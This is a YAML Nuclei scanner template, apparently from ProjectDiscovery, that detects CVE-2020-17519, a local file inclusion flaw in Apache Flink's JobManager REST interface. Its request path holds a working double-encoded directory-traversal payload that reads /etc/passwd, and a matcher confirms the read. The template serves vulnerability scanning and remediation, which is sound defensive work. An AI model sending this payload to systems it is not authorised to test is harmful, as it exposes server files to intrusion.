45 lines
1.8 KiB
YAML
45 lines
1.8 KiB
YAML
id: CVE-2020-17519
|
|
|
|
info:
|
|
name: Apache Flink - Local File Inclusion
|
|
author: pdteam
|
|
severity: high
|
|
description: Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion).
|
|
remediation: |
|
|
Apply the latest security patches or upgrade to a patched version of Apache Flink to mitigate the vulnerability.
|
|
reference:
|
|
- https://github.com/B1anda0/CVE-2020-17519
|
|
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E
|
|
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E
|
|
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-17519
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2020-17519
|
|
cwe-id: CWE-552
|
|
epss-score: 0.9717
|
|
epss-percentile: 0.99762
|
|
cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: apache
|
|
product: flink
|
|
tags: cve,cve2020,apache,lfi,flink
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100812a182f9e264266562b66fadd65d8abf60d24cea912d6b229ee432fe653a461022058d1d4b877abafdba6c1dbd0073d2961d1e8b45815933ad5faab8931c822cac3:922c64590222798bb761d5b6d8e72950 |